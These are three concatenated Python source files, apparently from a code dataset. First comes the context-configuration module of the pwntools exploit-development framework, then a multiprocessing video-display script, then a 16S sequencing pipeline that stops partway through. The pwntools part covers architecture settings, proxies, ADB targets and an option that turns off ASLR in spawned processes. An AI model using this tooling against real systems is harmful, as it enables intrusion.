'arch': 'i386',
'aslr': True,
'binary': None,
'bits': 32,
'device': os.getenv('ANDROID_SERIAL', None) or None,
'endian': 'little',
'kernel': None,
'log_level': logging.INFO,
'log_file': _devnull(),
'log_console': sys.stdout,
'randomize': False,
'newline': '\n',
'noptrace': False,
'os': 'linux',
'proxy': None,
'signed': False,
'terminal': None,
'timeout': Timeout.maximum,
}
#: Valid values for :meth:`pwnlib.context.ContextType.os`
oses = sorted(('linux','freebsd','windows','cgc','android'))
big_32 = {'endian': 'big', 'bits': 32}
big_64 = {'endian': 'big', 'bits': 64}
little_8 = {'endian': 'little', 'bits': 8}
little_16 = {'endian': 'little', 'bits': 16}
little_32 = {'endian': 'little', 'bits': 32}
little_64 = {'endian': 'little', 'bits': 64}
#: Keys are valid values for :meth:`pwnlib.context.ContextType.arch`.
#
#: Values are defaults which are set when
#: :attr:`pwnlib.context.ContextType.arch` is set
architectures = _longest({
'aarch64': little_64,
'alpha': little_64,
'avr': little_8,
'amd64': little_64,
'arm': little_32,
'cris': little_32,
'i386': little_32,
'ia64': big_64,
'm68k': big_32,
'mips': little_32,
'mips64': little_64,
'msp430': little_16,
'powerpc': big_32,
'powerpc64': big_64,
's390': big_32,
'sparc': big_32,
'sparc64': big_64,
'thumb': little_32,
'vax': little_32,
})
#: Valid values for :attr:`endian`
endiannesses = _longest({
'be': 'big',
'eb': 'big',
'big': 'big',
'le': 'little',
'el': 'little',
'little': 'little'
})
#: Valid string values for :attr:`signed`
signednesses = {
'unsigned': False,
'no': False,
'yes': True,
'signed': True
}
valid_signed = sorted(signednesses)
def __init__(self, **kwargs):
"""
Initialize the ContextType structure.
All keyword arguments are passed to :func:`update`.
"""
self._tls = _Tls_DictStack(_defaultdict(ContextType.defaults))
self.update(**kwargs)
def copy(self):
"""copy() -> dict
Returns a copy of the current context as a dictionary.
Examples:
>>> context.clear()
>>> context.os = 'linux'
>>> vars(context) == {'os': 'linux'}
True
"""
return self._tls.copy()
@property
def __dict__(self):
return self.copy()
def update(self, *args, **kwargs):
"""
Convenience function, which is shorthand for setting multiple
variables at once.
It is a simple shorthand such that::
context.update(os = 'linux', arch = 'arm', ...)
is equivalent to::
context.os = 'linux'
context.arch = 'arm'
...
The following syntax is also valid::
context.update({'os': 'linux', 'arch': 'arm'})
Arguments:
kwargs: Variables to be assigned in the environment.
Examples:
>>> context.clear()
>>> context.update(arch = 'i386', os = 'linux')
>>> context.arch, context.os
('i386', 'linux')
"""
for arg in args:
self.update(**arg)
for k,v in kwargs.items():
setattr(self,k,v)
def __repr__(self):
v = sorted("%s = %r" % (k,v) for k,v in self._tls._current.items())
return '%s(%s)' % (self.__class__.__name__, ', '.join(v))
def local(self, function=None, **kwargs):
"""local(**kwargs) -> context manager
Create a context manager for use with the ``with`` statement.
For more information, see the example below or PEP 343.
Arguments:
kwargs: Variables to be assigned in the new environment.
Returns:
ContextType manager for managing the old and new environment.
Examples:
>>> context.clear()
>>> context.timeout = 1
>>> context.timeout == 1
True
>>> print context.timeout
1.0
>>> with context.local(timeout = 2):
... print context.timeout
... context.timeout = 3
... print context.timeout
2.0
3.0
>>> print context.timeout
1.0
"""
class LocalContext(object):
def __enter__(a):
self._tls.push()
self.update(**{k:v for k,v in kwargs.items() if v is not None})
return self
def __exit__(a, *b, **c):
self._tls.pop()
def __call__(self, function, *a, **kw):
@functools.wraps(function)
def inner(*a, **kw):
with self:
return function(*a, **kw)
return inner
return LocalContext()
@property
def silent(self, function=None):
"""Disable all non-error logging within the enclosed scope.
"""
return self.local(function, log_level='error')
@property
def quiet(self, function=None):
"""Disables all non-error logging within the enclosed scope,
*unless* the debugging level is set to 'debug' or lower."""
if not function:
level = 'error'
if context.log_level <= logging.DEBUG:
level = None
return self.local(function, log_level=level)
@functools.wraps(function)
def wrapper(*a, **kw):
level = 'error'
if context.log_level <= logging.DEBUG:
level = None
with self.local(function, log_level=level):
return function(*a, **kw)
return wrapper
@property
def verbose(self):
"""Enable all logging within the enclosed scope.
"""
return self.local(log_level='debug')
def clear(self, *a, **kw):
"""
Clears the contents of the context.
All values are set to their defaults.
Arguments:
a: Arguments passed to ``update``
kw: Arguments passed to ``update``
Examples:
>>> # Default value
>>> context.arch == 'i386'
True
>>> context.arch = 'arm'
>>> context.arch == 'i386'
False
>>> context.clear()
>>> context.arch == 'i386'
True
"""
self._tls._current.clear()
if a or kw:
self.update(*a, **kw)
@property
def native(self):
if context.os in ('android', 'cgc'):
return False
arch = context.arch
with context.local(arch = platform.machine()):
platform_arch = context.arch
if arch in ('i386', 'amd64') and platform_arch in ('i386', 'amd64'):
return True
return arch == platform_arch
@_validator
def arch(self, arch):
"""
Target binary architecture.
Allowed values are listed in :attr:`pwnlib.context.ContextType.architectures`.
Side Effects:
If an architecture is specified which also implies additional
attributes (e.g. 'amd64' implies 64-bit words, 'powerpc' implies
big-endian), these attributes will be set on the context if a
user has not already set a value.
The following properties may be modified.
- :attr:`bits`
- :attr:`endian`
Raises:
AttributeError: An invalid architecture was specified
Examples:
>>> context.clear()
>>> context.arch == 'i386' # Default architecture
True
>>> context.arch = 'mips'
>>> context.arch == 'mips'
True
>>> context.arch = 'doge' #doctest: +ELLIPSIS
Traceback (most recent call last):
...
AttributeError: arch must be one of ['aarch64', ..., 'thumb']
>>> context.arch = 'ppc'
>>> context.arch == 'powerpc' # Aliased architecture
True
>>> context.clear()
>>> context.bits == 32 # Default value
True
>>> context.arch = 'amd64'
>>> context.bits == 64 # New value
True
Note that expressly setting :attr:`bits` means that we use
that value instead of the default
>>> context.clear()
>>> context.bits = 32
>>> context.arch = 'amd64'
>>> context.bits == 32
True
Setting the architecture can override the defaults for
both :attr:`endian` and :attr:`bits`
>>> context.clear()
>>> context.arch = 'powerpc64'
>>> vars(context) == {'arch': 'powerpc64', 'bits': 64, 'endian': 'big'}
True
"""
# Lowercase
arch = arch.lower()
# Attempt to perform convenience and legacy compatibility transformations.
# We have to make sure that x86_64 appears before x86 for this to work correctly.
transform = [('ppc64', 'powerpc64'),
('ppc', 'powerpc'),
('x86_64', 'amd64'),
('x86', 'i386'),
('i686', 'i386'),
('armeabi', 'arm'),
('arm64', 'aarch64')]
for k, v in transform:
if arch.startswith(k):
arch = v
break
try:
defaults = ContextType.architectures[arch]
except KeyError:
raise AttributeError('AttributeError: arch must be one of %r' % sorted(ContextType.architectures))
for k,v in ContextType.architectures[arch].items():
if k not in self._tls:
self._tls[k] = v
return arch
@_validator
def aslr(self, aslr):
"""
ASLR settings for new processes.
If ``False``, attempt to disable ASLR in all processes which are
created via ``personality`` (``setarch -R``) and ``setrlimit``
(``ulimit -s unlimited``).
The ``setarch`` changes are lost if a ``setuid`` binary is executed.
"""
return bool(aslr)
@_validator
def kernel(self, arch):
"""
Target machine's kernel architecture.
Usually, this is the same as ``arch``, except when
running a 32-bit binary on a 64-bit kernel (e.g. i386-on-amd64).
Even then, this doesn't matter much -- only when the the segment
registers need to be known
"""
with context.local(arch=arch):
return context.arch
@_validator
def bits(self, bits):
"""
Target machine word size, in bits (i.e. the size of general purpose registers).
The default value is ``32``, but changes according to :attr:`arch`.
Examples:
>>> context.clear()
>>> context.bits == 32
True
>>> context.bits = 64
>>> context.bits == 64
True
>>> context.bits = -1 #doctest: +ELLIPSIS
Traceback (most recent call last):
...
AttributeError: bits must be > 0 (-1)
"""
bits = int(bits)
if bits <= 0:
raise AttributeError("bits must be > 0 (%r)" % bits)
return bits
@_validator
def binary(self, binary):
"""
Infer target architecture, bit-with, and endianness from a binary file.
Data type is a :class:`pwnlib.elf.ELF` object.
Examples:
>>> context.clear()
>>> context.arch, context.bits
('i386', 32)
>>> context.binary = '/bin/bash'
>>> context.arch, context.bits
('amd64', 64)
>>> context.binary
ELF('/bin/bash')
"""
# Cyclic imports... sorry Idolf.
from ..elf import ELF
if not isinstance(binary, ELF):
binary = ELF(binary)
self.arch = binary.arch
self.bits = binary.bits
self.endian = binary.endian
return binary
@property
def bytes(self):
"""
Target machine word size, in bytes (i.e. the size of general purpose registers).
This is a convenience wrapper around ``bits / 8``.
Examples:
>>> context.bytes = 1
>>> context.bits == 8
True
>>> context.bytes = 0 #doctest: +ELLIPSIS
Traceback (most recent call last):
...
AttributeError: bits must be > 0 (0)
"""
return self.bits/8
@bytes.setter
def bytes(self, value):
self.bits = value*8
@_validator
def endian(self, endianness):
"""
Endianness of the target machine.
The default value is ``'little'``, but changes according to :attr:`arch`.
Raises:
AttributeError: An invalid endianness was provided
Examples:
>>> context.clear()
>>> context.endian == 'little'
True
>>> context.endian = 'big'
>>> context.endian
'big'
>>> context.endian = 'be'
>>> context.endian == 'big'
True
>>> context.endian = 'foobar' #doctest: +ELLIPSIS
Traceback (most recent call last):
...
AttributeError: endian must be one of ['be', 'big', 'eb', 'el', 'le', 'little']
"""
endian = endianness.lower()
if endian not in ContextType.endiannesses:
raise AttributeError("endian must be one of %r" % sorted(ContextType.endiannesses))
return ContextType.endiannesses[endian]
@_validator
def log_level(self, value):
"""
Sets the verbosity of ``pwntools`` logging mechanism.
More specifically it controls the filtering of messages that happens
inside the handler for logging to the screen. So if you want e.g. log
all messages to a file, then this attribute makes no difference to you.
Valid values are specified by the standard Python ``logging`` module.
Default value is set to ``INFO``.
Examples:
>>> context.log_level = 'error'
>>> context.log_level == logging.ERROR
True
>>> context.log_level = 10
>>> context.log_level = 'foobar' #doctest: +ELLIPSIS
Traceback (most recent call last):
...
AttributeError: log_level must be an integer or one of ['CRITICAL', 'DEBUG', 'ERROR', 'INFO', 'NOTSET', 'WARN', 'WARNING']
"""
# If it can be converted into an int, success
try: return int(value)
except ValueError: pass
# If it is defined in the logging module, success
try: return getattr(logging, value.upper())
except AttributeError: pass
# Otherwise, fail
level_names = filter(lambda x: isinstance(x,str), logging._levelNames)
permitted = sorted(level_names)
raise AttributeError('log_level must be an integer or one of %r' % permitted)
@_validator
def log_file(self, value):
r"""
Sets the target file for all logging output.
Works in a similar fashion to :attr:`log_level`.
Examples:
>>> context.log_file = 'foo.txt' #doctest: +ELLIPSIS
>>> log.debug('Hello!') #doctest: +ELLIPSIS
>>> with context.local(log_level='ERROR'): #doctest: +ELLIPSIS
... log.info('Hello again!')
>>> with context.local(log_file='bar.txt'):
... log.debug('Hello from bar!')
>>> log.info('Hello from foo!')
>>> file('foo.txt').readlines()[-3] #doctest: +ELLIPSIS
'...:DEBUG:...:Hello!\n'
>>> file('foo.txt').readlines()[-2] #doctest: +ELLIPSIS
'...:INFO:...:Hello again!\n'
>>> file('foo.txt').readlines()[-1] #doctest: +ELLIPSIS
'...:INFO:...:Hello from foo!\n'
>>> file('bar.txt').readlines()[-1] #doctest: +ELLIPSIS
'...:DEBUG:...:Hello from bar!\n'
"""
if isinstance(value, (str,unicode)):
modes = ('w', 'wb', 'a', 'ab')
# check if mode was specified as "[value],[mode]"
if ',' not in value:
value += ',a'
filename, mode = value.rsplit(',', 1)
value = open(filename, mode)
elif not isinstance(value, (file)):
raise AttributeError('log_file must be a file')
# Is this the same file we already have open?
# If so, don't re-print the banner.
if self.log_file and not isinstance(self.log_file, _devnull):
a = os.fstat(value.fileno()).st_ino
b = os.fstat(self.log_file.fileno()).st_ino
if a == b:
return self.log_file
iso_8601 = '%Y-%m-%dT%H:%M:%S'
lines = [
'=' * 78,
' Started at %s ' % time.strftime(iso_8601),
' sys.argv = [',
]
for arg in sys.argv:
lines.append(' %r,' % arg)
lines.append(' ]')
lines.append('=' * 78)
for line in lines:
value.write('=%-78s=\n' % line)
value.flush()
return value
@_validator
def log_console(self, stream):
"""
Sets the default logging console target.
Examples:
>>> context.log_level = 'warn'
>>> log.warn("Hello")
[!] Hello
>>> context.log_console=open('/dev/null', 'w')
>>> log.warn("Hello")
>>> context.clear()
"""
if isinstance(stream, str):
stream = open(stream, 'wt')
return stream
@property
def mask(self):
return (1 << self.bits) - 1
@_validator
def os(self, os):
"""
Operating system of the target machine.
The default value is ``linux``.
Allowed values are listed in :attr:`pwnlib.context.ContextType.oses`.
Examples:
>>> context.os = 'linux'
>>> context.os = 'foobar' #doctest: +ELLIPSIS
Traceback (most recent call last):
...
AttributeError: os must be one of ['android', 'cgc', 'freebsd', 'linux', 'windows']
"""
os = os.lower()
if os not in ContextType.oses:
raise AttributeError("os must be one of %r" % ContextType.oses)
return os
@_validator
def randomize(self, r):
"""
Global flag that lots of things should be randomized.
"""
return bool(r)
@_validator
def signed(self, signed):
"""
Signed-ness for packing operation when it's not explicitly set.
Can be set to any non-string truthy value, or the specific string
values ``'signed'`` or ``'unsigned'`` which are converted into
``True`` and ``False`` correspondingly.
Examples:
>>> context.signed
False
>>> context.signed = 1
>>> context.signed
True
>>> context.signed = 'signed'
>>> context.signed
True
>>> context.signed = 'unsigned'
>>> context.signed
False
>>> context.signed = 'foobar' #doctest: +ELLIPSIS
Traceback (most recent call last):
...
AttributeError: signed must be one of ['no', 'signed', 'unsigned', 'yes'] or a non-string truthy value
"""
try: signed = ContextType.signednesses[signed]
except KeyError: pass
if isinstance(signed, str):
raise AttributeError('signed must be one of %r or a non-string truthy value' % sorted(ContextType.signednesses))
return bool(signed)
@_validator
def timeout(self, value=Timeout.default):
"""
Default amount of time to wait for a blocking operation before it times out,
specified in seconds.
The default value is to have an infinite timeout.
See :class:`pwnlib.timeout.Timeout` for additional information on
valid values.
"""
return Timeout(value).timeout
@_validator
def terminal(self, value):
"""
Default terminal used by :meth:`pwnlib.util.misc.run_in_new_terminal`.
Can be a string or an iterable of strings. In the latter case the first
entry is the terminal and the rest are default arguments.
"""
if isinstance(value, (str, unicode)):
return [value]
return value
@property
def abi(self):
return self._abi
@_validator
def proxy(self, proxy):
"""
Default proxy for all socket connections.
Accepts either a string (hostname or IP address) for a SOCKS5 proxy on
the default port, **or** a ``tuple`` passed to ``socks.set_default_proxy``,
e.g. ``(socks.SOCKS4, 'localhost', 1234)``.
>>> context.proxy = 'localhost' #doctest: +ELLIPSIS
>>> r=remote('google.com', 80)
Traceback (most recent call last):
...
ProxyConnectionError: Error connecting to SOCKS5 proxy localhost:1080: [Errno 111] Connection refused
>>> context.proxy = None
>>> r=remote('google.com', 80, level='error')
"""
if not proxy:
socket.socket = _original_socket
return None
if isinstance(proxy, str):
proxy = (socks.SOCKS5, proxy)
if not isinstance(proxy, collections.Iterable):
raise AttributeError('proxy must be a string hostname, or tuple of arguments for socks.set_default_proxy')
socks.set_default_proxy(*proxy)
socket.socket = socks.socksocket
return proxy
@_validator
def noptrace(self, value):
"""Disable all actions which rely on ptrace.
This is useful for switching between local exploitation with a debugger,
and remote exploitation (without a debugger).
This option can be set with the ``NOPTRACE`` command-line argument.
"""
return bool(value)
@_validator
def adb_host(self, value):
"""Sets the target host which is used for ADB.
This is useful for Android exploitation.
The default value is inherited from ANDROID_ADB_SERVER_HOST, or set
to the default 'localhost'.
"""
return str(value)
@_validator
def adb_port(self, value):
"""Sets the target port which is used for ADB.
This is useful for Android exploitation.
The default value is inherited from ANDROID_ADB_SERVER_PORT, or set
to the default 5037.
"""
return int(value)
@_validator
def device(self, device):
"""Sets the device being operated on.
"""
if isinstance(device, Device):
self.arch = device.arch or self.arch
self.bits = device.bits or self.bits
self.endian = device.endian or self.endian
self.os = device.os or self.os
elif isinstance(device, str):
device = Device(device)
else:
raise AttributeError("device must be either a Device object or a serial number as a string")
return device
@property
def adb(self):
"""Returns an argument array for connecting to adb."""
command = ['adb']
if self.adb_host != self.defaults['adb_host']:
command += ['-H', self.adb_host]
if self.adb_port != self.defaults['adb_port']:
command += ['-P', str(self.adb_port)]
if self.device:
command += ['-s', str(self.device)]
return command
#*************************************************************************
# ALIASES
#*************************************************************************
#
# These fields are aliases for fields defined above, either for
# convenience or compatibility.
#
#*************************************************************************
def __call__(self, **kwargs):
"""
Alias for :meth:`pwnlib.context.ContextType.update`
"""
return self.update(**kwargs)
def reset_local(self):
"""
Deprecated. Use :meth:`clear`.
"""
self.clear()
@property
def endianness(self):
"""
Legacy alias for :attr:`endian`.
Examples:
>>> context.endian == context.endianness
True
"""
return self.endian
@endianness.setter
def endianness(self, value):
self.endian = value
@property
def sign(self):
"""
Alias for :attr:`signed`
"""
return self.signed
@sign.setter
def sign(self, value):
self.signed = value
@property
def signedness(self):
"""
Alias for :attr:`signed`
"""
return self.signed
@signedness.setter
def signedness(self, value):
self.signed = value
@property
def word_size(self):
"""
Alias for :attr:`bits`
"""
return self.bits
@word_size.setter
def word_size(self, value):
self.bits = value
Thread = Thread
#: Global ``context`` object, used to store commonly-used pwntools settings.
#: In most cases, the context is used to infer default variables values.
#: For example, :meth:`pwnlib.asm.asm` can take an ``os`` parameter as a
#: keyword argument. If it is not supplied, the ``os`` specified by
#: ``context`` is used instead.
#: Consider it a shorthand to passing ``os=`` and ``arch=`` to every single
#: function call.
context = ContextType()
# Inherit default ADB values
if 'ANDROID_ADB_SERVER_HOST' in os.environ:
context.adb_host = os.environ.get('ANDROID_ADB_SERVER_HOST')
if 'ANDROID_ADB_SERVER_PORT' in os.environ:
context.adb_port = int(os.getenv('ANDROID_ADB_SERVER_PORT'))
def LocalContext(function):
"""
Wraps the specified function on a context.local() block, using kwargs.
Example:
>>> @LocalContext
... def printArch():
... print(context.arch)
>>> printArch()
i386
>>> printArch(arch='arm')
arm
"""
@functools.wraps(function)
def setter(*a, **kw):
# Fast path to skip adding a Context frame
if not kw:
return function(*a)
with context.local(**{k:kw.pop(k) for k,v in kw.items() if isinstance(getattr(ContextType, k, None), property)}):
return function(*a, **kw)
return setter
|
final.py
|
from imutils.video import FPS
import imutils
import cv2
import numpy as np
import heapq
import time
import multiprocessing
from multiprocessing import Pool, Queue
RESIZE = 100
def worker(input_q, output_q):
while True:
frameinfo = input_q.get()
# frame_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
# time.sleep(.05)
# output = imutils.resize(frameinfo[1], width=RESIZE, height=RESIZE)
# output_q.put([frameinfo[0],output])
output_q.put([frameinfo[0],frameinfo[1]])
def displayworker(display_q,npsave):
while True:
frame = display_q.get()
cv2.imshow('Video', frame)
cv2.waitKey(1)
if __name__ == '__main__':
qu_limit = 50
threadn = cv2.getNumberOfCPUs()
print("Threads : ", threadn)
input_q = Queue(qu_limit) # fps is better if queue is higher but then more lags
# input_q= heapq.heapify(input_q)
output_q = Queue()
display_q = Queue()
npsave = np.zeros([2,2])
for i in range(50):
p = multiprocessing.Process(target=worker, args=[input_q, output_q])
p.start()
D = multiprocessing.Process(target=displayworker, args=[display_q, npsave])
D.start()
img = cv2.VideoCapture('sample.mp4')
fps = FPS().start()
frame_count = 0
while True and frame_count< 1000:
ret, frame = img.read()
# if frame_count % qu_limit == 0:
# input_q.put(frame)
input_q.put([time.time(),frame])
if output_q.empty():
pass # fill up queue
else:
frame_count += 1
dummylist=[]
for i in range(output_q.qsize()):
dummylist.append(output_q.get())
dummylist.sort()
for i in dummylist:
display_q.put(i[1])
# data = output_q.get()[1]
# display_q.put(data)
fps.update()
if cv2.waitKey(1) & 0xFF == ord('q'):
break
fps.stop()
print('[INFO] elapsed time (total): {:.2f}'.format(fps.elapsed()))
print('[INFO] approx. FPS: {:.2f}'.format(fps.fps()))
cv2.destroyAllWindows()
|
sixteens_full.py
|
#!/usr/bin/env python3
from olctools.accessoryFunctions.accessoryFunctions import MetadataObject, GenObject, make_path, write_to_logfile, \
run_subprocess
from genemethods.sipprCommon.objectprep import Objectprep
from genemethods.sipprCommon.sippingmethods import Sippr
from Bio.Blast.Applications import NcbiblastnCommandline
from Bio.SeqRecord import SeqRecord
from Bio.Seq import Seq
import Bio.Application
from Bio import SeqIO
from argparse import ArgumentParser
from click import progressbar
from subprocess import Popen
from threading import Thread
from subprocess import PIPE
from csv import DictReader
from queue import Queue
import multiprocessing
from glob import glob
import operator
import logging
import time
import os
__author__ = 'adamkoziol'
class SixteenSBait(Sippr):
def main(self):
"""
Run the required methods in the appropriate order
"""
self.targets()
self.bait(k=49)
self.reversebait(maskmiddle='t', k=19)
self.subsample_reads()
def targets(self):
"""
Create the GenObject for the analysis type, create the hash file for baiting (if necessary)
"""
for sample in self.runmetadata:
setattr(sample, self.analysistype, GenObject())
if sample.general.bestassemblyfile != 'NA':
sample[self.analysistype].runanalysis = True
sample[self.analysistype].targetpath = self.targetpath
baitpath = os.path.join(self.targetpath, 'bait')
sample[self.analysistype].baitfile = glob(os.path.join(baitpath, '*.fa'))[0]
try:
sample[self.analysistype].outputdir = os.path.join(sample.run.outputdirectory, self.analysistype)
except AttributeError:
sample[self.analysistype].outputdir = \
os.path.join(sample.general.outputdirectory, self.analysistype)
sample.run.outputdirectory = sample.general.outputdirectory
sample[self.analysistype].logout = os.path.join(sample[self.analysistype].outputdir, 'logout.txt')
sample[self.analysistype].logerr = os.path.join(sample[self.analysistype].outputdir, 'logerr.txt')
sample[self.analysistype].baitedfastq = os.path.join(sample[self.analysistype].outputdir,
'{at}_targetMatches.fastq'
.format(at=self.analysistype))
sample[self.analysistype].complete = False
else:
sample[self.analysistype].runanalysis = False
sample[self.analysistype].targetpath = self.targetpath
sample[self.analysistype].outputdir = 'NA'
sample.run.outputdirectory = 'NA'
class SixteenSSipper(Sippr):
def main(self):
"""
Run the required methods in the appropriate order
"""
self.targets()
self.bait()
# If desired, use bbduk to bait the target sequences with the previously baited FASTQ files
if self.revbait:
self.reversebait()
# Run the bowtie2 read mapping module
self.mapping()
# Use samtools to index the sorted bam file
self.indexing()
# Parse the results
self.parsebam()
def targets(self):
"""
Using the data from the BLAST analyses, set the targets folder, and create the 'mapping file'. This is the
genera-specific FASTA file that will be used for all the reference mapping; it replaces the 'bait file' in the
code
"""
logging.info('Performing analysis with {at} targets folder'.format(at=self.analysistype))
for sample in self.runmetadata:
if sample.general.bestassemblyfile != 'NA':
sample[self.analysistype].targetpath = \
os.path.join(self.targetpath, 'genera', sample[self.analysistype].genus)
# There is a relatively strict databasing scheme necessary for the custom targets. Eventually,
# there will be a helper script to combine individual files into a properly formatted combined file
try:
sample[self.analysistype].mappingfile = glob(os.path.join(sample[self.analysistype].targetpath,
'*.fa'))[0]
# If the fasta file is missing, raise a custom error
except IndexError as e:
# noinspection PyPropertyAccess
e.args = ['Cannot find the combined fasta file in {target_path}. '
'Please note that the file must have a .fasta extension'
.format(target_path=sample[self.analysistype].targetpath)]
if os.path.isdir(sample[self.analysistype].targetpath):
raise
else:
sample.general.bestassemblyfile = 'NA'
class SixteenS(object):
def runner(self):
"""
Run the necessary methods in the correct order
"""
logging.info('Starting {} analysis pipeline'.format(self.analysistype))
if not self.pipeline:
# If the metadata has been passed from the method script, self.pipeline must still be false in order to
# get Sippr() to function correctly, but the metadata shouldn't be recreated
try:
_ = vars(self.runmetadata)['samples']
except AttributeError:
# Create the objects to be used in the analyses
objects = Objectprep(self)
objects.objectprep()
self.runmetadata = objects.samples
else:
for sample in self.runmetadata.samples:
setattr(sample, self.analysistype, GenObject())
sample.run.outputdirectory = sample.general.outputdirectory
self.threads = int(self.cpus / len(self.runmetadata.samples)) \
if self.cpus / len(self.runmetadata.samples) > 1 \
else 1
# Use a custom sippr method to use the full reference database as bait, and run mirabait against the FASTQ
# reads - do not perform reference mapping yet
SixteenSBait(self, self.cutoff)
# Subsample 1000 reads from the FASTQ files
self.subsample()
# Convert the subsampled FASTQ files to FASTA format
self.fasta()
# Create BLAST databases if required
self.makeblastdb()
# Run BLAST analyses of the subsampled FASTA files against the NCBI 16S reference database
self.blast()
# Parse the BLAST results
self.blastparse()
# Feed the BLAST results into a modified sippr method to perform reference mapping using the calculated
# genus of the sample as the mapping file
SixteenSSipper(inputobject=self,
cutoff=self.cutoff,
allow_soft_clips=self.allow_soft_clips)
# Create reports
self.reporter()
def subsample(self):
"""
Subsample 1000 reads from the baited files
"""
# Create the threads for the analysis
logging.info('Subsampling FASTQ reads')
for _ in range(self.cpus):
threads = Thread(target=self.subsamplethreads, args=())
threads.setDaemon(True)
threads.start()
with progressbar(self.runmetadata.samples) as bar:
for sample in bar:
if sample.general.bestassemblyfile != 'NA':
# Set the name of the subsampled FASTQ file
sample[self.analysistype].subsampledfastq = \
os.path.splitext(sample[self.analysistype].baitedfastq)[0] + '_subsampled.fastq'
# Set the system call
sample[self.analysistype].seqtkcall = 'reformat.sh in={baited} out={subsampled} ' \
'samplereadstarget=1000'\
.format(baited=sample[self.analysistype].baitedfastq,
subsampled=sample[self.analysistype].subsampledfastq)
# Add the sample to the queue
self.samplequeue.put(sample)
self.samplequeue.join()
def subsamplethreads(self):
while True:
sample = self.samplequeue.get()
# Check to see if the subsampled FASTQ file has already been created
if not os.path.isfile(sample[self.analysistype].subsampledfastq):
# Run the system call
out, err = run_subprocess(sample[self.analysistype].seqtkcall)
write_to_logfile(sample[self.analysistype].seqtkcall,
sample[self.analysistype].seqtkcall,
self.logfile, sample.general.logout, sample.general.logerr,
sample[self.analysistype].logout, sample[self.analysistype].logerr)
write_to_logfile(out,
err,
self.logfile, sample.general.logout, sample.general.logerr,
sample[self.analysistype].logout, sample[self.analysistype].logerr)
self.samplequeue.task_done()
def fasta(self):
"""
Convert the subsampled reads to FASTA format using reformat.sh
"""
logging.info('Converting FASTQ files to FASTA format')
# Create the threads for the analysis
for _ in range(self.cpus):
threads = Thread(target=self.fastathreads, args=())
threads.setDaemon(True)
threads.start()
with progressbar(self.runmetadata.samples) as bar:
for sample in bar:
if sample.general.bestassemblyfile != 'NA':
# Set the name as the FASTA file - the same as the FASTQ, but with .fa file extension
sample[self.analysistype].fasta = \
os.path.splitext(sample[self.analysistype].subsampledfastq)[0] + '.fa'
# Set the system call
sample[self.analysistype].reformatcall = 'reformat.sh in={fastq} out={fasta}'\
.format(fastq=sample[self.analysistype].subsampledfastq,
fasta=sample[self.analysistype].fasta)
# Add the sample to the queue
self.fastaqueue.put(sample)
self.fastaqueue.join()
def fastathreads(self):
while True:
sample = self.fastaqueue.get()
# Check to see if the FASTA file already exists
if not os.path.isfile(sample[self.analysistype].fasta):
# Run the system call
out, err = run_subprocess(sample[self.analysistype].reformatcall)
write_to_logfile(sample[self.analysistype].reformatcall,
sample[self.analysistype].reformatcall,
self.logfile, sample.general.logout, sample.general.logerr,
sample[self.analysistype].logout, sample[self.analysistype].logerr)
write_to_logfile(out,
err,
self.logfile, sample.general.logout, sample.general.logerr,
sample[self.analysistype].logout, sample[self.analysistype].logerr)
self.fastaqueue.task_done()
def makeblastdb(self):
"""
Makes blast database files from targets as necessary
"""
# Iterate through the samples to set the bait file.
for sample in self.runmetadata.samples:
if sample.general.bestassemblyfile != 'NA':
# Remove the file extension
db = os.path.splitext(sample[self.analysistype].baitfile)[0]
# Add '.nhr' for searching below
nhr = '{db}.nhr'.format(db=db)
# Check for already existing database files
if not os.path.isfile(str(nhr)):
# Create the databases
command = 'makeblastdb -in {bait} -parse_seqids -max_file_sz 2GB -dbtype nucl -out {out}'\
.format(bait=sample[self.analysistype].baitfile,
out=db)
out, err = run_subprocess(command)
write_to_logfile(out=command,
err=command,
logfile=self.logfile,
samplelog=sample.general.logout,
sampleerr=sample.general.logerr,
analysislog=sample[self.analysistype].logout,
analysiserr=sample[self.analysistype].logerr)
write_to_logfile(out=out,
err=err,
logfile=self.logfile,
samplelog=sample.general.logout,
sampleerr=sample.general.logerr,
analysislog=sample[self.analysistype].logout,
analysiserr=sample[self.analysistype].logerr)
def blast(self):
"""
Run BLAST analyses of the subsampled FASTQ reads against the NCBI 16S reference database
"""
logging.info('BLASTing FASTA files against {at} database'.format(at=self.analysistype))
for _ in range(self.cpus):
threads = Thread(target=self.blastthreads, args=())
threads.setDaemon(True)
threads.start()
with progressbar(self.runmetadata.samples) as bar:
for sample in bar:
if sample.general.bestassemblyfile != 'NA':
# Set the name of the BLAST report
sample[self.analysistype].blastreport = os.path.join(
sample[self.analysistype].outputdir,
'{sn}_{at}_blastresults.csv'.format(sn=sample.name,
at=self.analysistype))
# Use the NCBI BLASTn command line wrapper module from BioPython to set the parameters of the search
blastn = NcbiblastnCommandline(query=sample[self.analysistype].fasta,
db=os.path.splitext(sample[self.analysistype].baitfile)[0],
max_target_seqs=1,
num_threads=self.threads,
outfmt="6 qseqid sseqid positive mismatch gaps evalue bitscore "
"slen length qstart qend qseq sstart send sseq",
out=sample[self.analysistype].blastreport)
# Add a string of the command to the metadata object
sample[self.analysistype].blastcall = str(blastn)
# Add the object and the command to the BLAST queue
self.blastqueue.put((sample, blastn))
self.blastqueue.join()
def blastthreads(self):
while True:
sample, blastn = self.blastqueue.get()
if not os.path.isfile(sample[self.analysistype].blastreport):
# Ensure that the query file exists; this can happen with very small .fastq files
if os.path.isfile(sample[self.analysistype].fasta):
# Perform the BLAST analysis
try:
blastn()
except Bio.Application.ApplicationError:
sample[self.analysistype].blastreport = str()
self.blastqueue.task_done()
def blastparse(self):
"""
Parse the blast results, and store necessary data in dictionaries in sample object
"""
logging.info('Parsing BLAST results')
# Load the NCBI 16S reference database as a dictionary
for sample in self.runmetadata.samples:
if sample.general.bestassemblyfile != 'NA':
# Load the NCBI 16S reference database as a dictionary
dbrecords = SeqIO.to_dict(SeqIO.parse(sample[self.analysistype].baitfile, 'fasta'))
# Allow for no BLAST results
if os.path.isfile(sample[self.analysistype].blastreport):
# Initialise a dictionary to store the number of times a genus is the best hit
sample[self.analysistype].frequency = dict()
# Open the sequence profile file as a dictionary
blastdict = DictReader(open(sample[self.analysistype].blastreport),
fieldnames=self.fieldnames, dialect='excel-tab')
recorddict = dict()
for record in blastdict:
# Create the subject id. It will look like this: gi|1018196593|ref|NR_136472.1|
subject = record['subject_id']
# Extract the genus name. Use the subject id as a key in the dictionary of the reference db.
# It will return the full record e.g. gi|1018196593|ref|NR_136472.1| Escherichia marmotae
# strain HT073016 16S ribosomal RNA, partial sequence
